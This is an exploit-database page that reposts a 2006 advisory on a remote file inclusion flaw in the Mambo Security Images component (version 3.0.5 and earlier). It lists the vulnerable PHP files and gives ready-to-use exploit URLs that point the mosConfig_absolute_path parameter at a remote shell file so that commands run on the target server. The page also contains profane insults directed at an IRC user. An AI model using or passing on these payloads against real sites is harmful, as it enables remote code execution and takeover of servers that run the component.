[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Mambo Security Images Component <= 3.0.5 Inclusion Vulnerabilities

Author
Drago84
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-613
Category
web applications
Date add
27-07-2006
Platform
unsorted
==================================================================
Mambo Security Images Component <= 3.0.5 Inclusion Vulnerabilities
==================================================================



# http://forge.joomla.org/sf/projects/com_securityimages

##### Marckusbest is the Best lamah of irc, fuck you
##########
com_securityimages Mambo  Remote File Include
------------------------------------------------------------------------------------
Bug Found by: Drago84
greetz: Exclusive Security
This bug allows a remote atacker to execute commands via
rfi

page:
client.php
configinsert.php
lang.php
server.php

expl:
http://web/components/com_securityimages/configinsert.php?mosConfig_absolute_path=http://shell.txt
http://web/components/com_securityimages/lang.php?mosConfig_absolute_path=http://shell.txt

########## MarckusBest Fottiti
#############################



#  0day.today [2024-12-25]  #